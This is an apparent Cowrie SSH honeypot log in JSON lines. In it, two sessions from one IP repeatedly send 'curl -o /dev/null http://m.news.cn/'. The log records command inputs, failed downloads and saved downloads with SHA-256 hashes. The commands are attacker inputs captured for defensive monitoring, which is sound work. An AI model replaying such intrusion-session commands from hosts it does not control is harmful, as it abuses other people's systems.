{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.942785Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.943876Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.964476Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.976346Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.977427Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.983013Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.983909Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.013952Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.019017Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.020095Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.025446Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.026272Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.035643Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.059877Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.060959Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.067526Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.068511Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.104185Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.105238Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.111218Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.113858Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.114868Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.145665Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.146797Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.148424Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.152273Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.155667Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.156661Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.177158Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.178628Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.186548Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.187560Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.194973Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.196028Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.222867Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.223882Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.234553Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.235542Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.264300Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.265289Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.304619Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.307087Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.355303Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.356828Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.411417Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.413517Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.460062Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.529511Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.530774Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.549583Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.604692Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.606004Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.642117Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.644940Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.646119Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.676759Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.679652Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.682942Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.686310Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.687342Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.720378Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.724498Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.725514Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.733253Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.769650Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.772644Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.773703Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.797979Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.800431Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.836753Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.837977Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.843686Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.846416Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.851624Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.880666Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.881916Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.885039Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.900679Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:24.923300Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.924173Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.947102Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:24.948934Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.052242Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.053496Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.080708Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.081878Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.086177Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.087164Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.108546Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.117934Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.119298Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.131037Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.132307Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.173591Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.175045Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.191049Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.235439Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.237005Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.259170Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.260349Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.267541Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.268493Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.293282Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.294436Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.303973Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.305245Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.311882Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.313200Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.342040Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.343167Z","src_ip":"212.227.125.160","session":"7541ed730449"}
